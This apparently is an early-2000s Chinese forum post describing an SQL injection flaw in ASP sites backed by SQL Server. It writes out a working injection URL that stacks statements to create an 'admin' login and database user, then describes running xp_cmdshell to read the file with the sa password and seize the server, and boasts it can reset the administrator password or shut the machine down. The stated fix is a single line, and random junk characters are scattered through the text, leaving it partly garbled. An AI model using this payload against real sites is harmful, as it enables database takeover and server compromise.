为了考证这种类型的程序BUG,笔者最近去了很多用ASP和SQL SERVER做的网站,发现绝大部分网站的程序有这个BUG,于是觉得有必要把这个问题贴出,以免大家犯同样的错误。$ W! i; P }0 w3 q
BUG描述:- v f8 t/ \5 [9 p
把一个有参数的xxx.asp?x=x程序变成xxx.asp?x=x;use pubs;exec sp_addlogin 'admin','admin','master';exec sp_adduser 'admin','admin','db_ower';--
" d5 j( r y% Y: M2 K BUG讲解:, ]8 Y. [5 p/ D
这个BUG是利用参数未过滤来执行SQL语句增加一个用户,然后可以用此用户连上SQL SERVER,再通过exec xp_cmdshell 'type x.asp'来查看存有sa密码的ASP文件来获得SQL SERVER的最高权限。& s" s" x! @9 A
BUG消除:
$ M3 ~4 F; `/ e 程序增加参数过滤: f8 m# l9 h# h- v
附:sp_addlogin和sp_adduser语法
8 C; w# D# `! N9 C. {sp_addlogin [@loginame =] 'login'
+ _8 q4 O0 z4 o3 r, M1 a) B6 h [,][@passwd =] 'password']# b: j* N8 S$ I4 K( P
[,][@defdb =] 'database']
7 _$ t) T6 ?) M3 Y4 _, p1 a [,][@deflanguage =] 'language']
: J& _( L0 @5 n8 P0 o3 s$ n [,[@sid =] 'sid']
' L. P- L! I$ k) U) y [,][@encryptopt =] 'encryption_option']
" s' G1 b2 U& I" f2 dsp_adduser [@loginame =] 'login'- ^7 w, g$ }: _( a E, a' x( T, w
[,][@name_in_db =] 'user']7 w4 p. _8 @6 s: x
[,][@grpname =] 'group']
2 D6 Y R( s8 L" n( l 注:如果采取SQL SERVER设为本地连接、改变端品号、drop xp_cmdshell等等可以防止很多攻击行为呀 ^_^
1 S* {( J4 [7 ]0 O, C嘿嘿,这个BUG还可以用来改administrator的密码,让服务器关机等等
p) e" W4 X9 M4 P$ r$ z |
/1 
44152102000001
发表于 2002-2-10 17:14:05
